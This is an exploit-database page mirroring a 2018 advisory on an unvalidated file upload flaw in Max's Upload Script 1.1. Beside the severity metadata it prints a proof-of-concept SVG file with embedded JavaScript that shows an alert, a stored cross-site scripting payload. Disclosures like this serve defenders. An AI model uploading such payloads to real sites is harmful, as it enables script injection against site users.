Advertisement






Max’s Upload Script unvaliated file upload Vulnerability

CVE Category Price Severity
N/A CWE-434 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2018-01-22
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010218

Below is a copy:

Maxs Upload Script unvaliated file upload Vulnerability
[+] Exploit Title ; Maxs Upload Script unvaliated file upload Vulnerability

[+] Date : 2018-01-22

[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS

[+] Vendor HomePage : http://www.xscript.ir

[+] Dork : N/A

[+] Version : 1.1

[+] Tested On : windows 10 - kali linux 2.0

[+] Contact : https://telegram.me/WebServer

[+] Poc :

[*] Ajax File upload is a script for uploading file

[*] But there is no security in this script

[*] And You Can Upload Any File For Example svg files :

[*] You Can Use This Payload : 

[+] Payload :

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">
    alert('Hacked bY : 0P3N3R');
  </script>
</svg>




[+] Exploitation Technique:

[!] remote


[+] Severity Level:

[!] High



[+] We Are :

[!] 0P3N3R [+] Mehrdad_Ice [+] BaxTurk24 [+] S0hp

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.